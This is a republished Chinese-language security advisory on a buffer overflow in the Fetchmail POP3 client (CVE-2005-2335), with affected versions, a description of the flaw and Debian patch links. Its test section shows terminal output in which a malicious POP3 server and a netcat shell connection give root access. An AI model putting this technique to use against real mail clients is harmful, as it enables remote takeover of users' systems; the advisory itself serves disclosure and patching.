Fetchmail POP3客户端缓冲区溢出漏洞

发布日期：2005-07-26
更新日期：2006-08-02

受影响系统：

Eric Raymond Fetchmail 6.2.5.1
Eric Raymond Fetchmail 6.2.5
Eric Raymond Fetchmail 6.2.0
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux WS 2.1 IA64
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux ES 2.1 IA64
RedHat Enterprise Linux ES 2.1
RedHat Enterprise Linux AS 3
RedHat Enterprise Linux AS 2.1 IA64
RedHat Enterprise Linux AS 2.1
RedHat Desktop 4.0
RedHat Desktop 3.0
RedHat Advanced Workstation 2.1 IA64
RedHat Advanced Workstation 2.1

不受影响系统：

Eric Raymond Fetchmail 6.2.6-pre7
Eric Raymond Fetchmail 6.2.5.2

描述：

---

BUGTRAQ ID: 14349
CVE(CAN) ID: CVE-2005-2335

fetchmail是免费的软件包，可以从远程POP2、POP3、IMAP、ETRN或ODMR服务器检索邮件并将其转发给本地SMTP、LMTP服务器或消息传送代理。

fetchmail的POP3客户端在处理服务器回应时存在缓冲区溢出漏洞，恶意服务器可能利用此漏洞在客户端上执行任意指令。

fetchmail-6.2.5及更早版本的处理UID的POP3代码将POP3服务器返回的相应读取到栈中固定大小的缓冲区，没有限制输入长度，这样被入侵的或恶意的POP3服务器就可以覆盖fetchmail的栈，导致完全控制受影响的系统。

在fetchmail-6.2.5.1中，漏洞修复可以通过POP3 UIDL防范代码注入，但却引入了两个空指针引用。攻击者可能利用这个漏洞导致拒绝服务。

<*来源：Edward J. Shornock
Miloslav Trmac
Ludwig Nussel （lnussel@suse.de）
Matthias Andree （matthias.andree@gmx.de）

链接：http://fetchmail.berlios.de/fetchmail-SA-2005-01.txt
http://marc.theaimsgroup.com/?l=bugtraq&m=115447626326322&w=2
http://lwn.net/Alerts/144832/?format=printable
http://security.gentoo.org/glsa/glsa-200507-21.xml
http://www.debian.org/security/2005/dsa-774
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<--- in terminal 1 --->

farenhiet:/home/bannedit/fetchmail-6.2.5# /usr/local/bin/fetchmail -p pop3 --fastuidl 1 localhost
fetchmail: removing stale lockfile
Enter password for root@localhost:
UIDL 2

<--- in terminal 2 --->

farenhiet:/home/bannedit/exploit# perl -e '$| ;while (<>) { print . "\n\x00"; }' | nc localhost 20000
id
uid=0(root) gid=0(root) groups=0(root)

建议：

---

厂商补丁：

Apple
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.apple.com/support/downloads/

Debian
------
Debian已经为此发布了一个安全公告（DSA-774-1）以及相应补丁:
DSA-774-1：New fetchmail packages fix arbitrary code execution
链接：http://www.debian.org/security/2005/dsa-774

补丁下载：
Source archives:

http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1.dsc
Size/MD5 checksum: 650 3eb739416b5b7a906b56b3145cf1ba32
http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1.diff.gz
Size/MD5 checksum: 150578 12cdd33c6299e840ffcf3cfa00eb2e0e
http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5.orig.tar.gz
Size/MD5 checksum: 1257376 9956b30139edaa4f5f77c4d0dbd80225

Architecture independent components:

http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail-ssl_6.2.5-12sarge1_all.deb
Size/MD5 checksum: 42268 593148b798ec57fbca09340ecb139c1e
http://security.debian.org/pool/updates/main/f/fetchmail/fetchmailconf_6.2.5-12sarge1_all.deb
Size/MD5 checksum: 101356 c7e81ed2ef2c7375e3afb9d937a1aa91

Alpha architecture:

http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_alpha.deb
Size/MD5 checksum: 572940 7426819c3db555eb6c1b5bf866b2113d

AMD64 architecture:

http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_amd64.deb
Size/MD5 checksum: 554678 56223b7979f4e4410c05620d153a01ba

ARM architecture:

http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_arm.deb
Size/MD5 checksum: 549146 b8f0493390f4aa713004f913f2696e73

Intel IA-32 architecture:

http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_i386.deb
Size/MD5 checksum: 548184 4b004ec450045c4d0d4b9fda7d9b04cc

Intel IA-64 architecture:

http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_ia64.deb

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!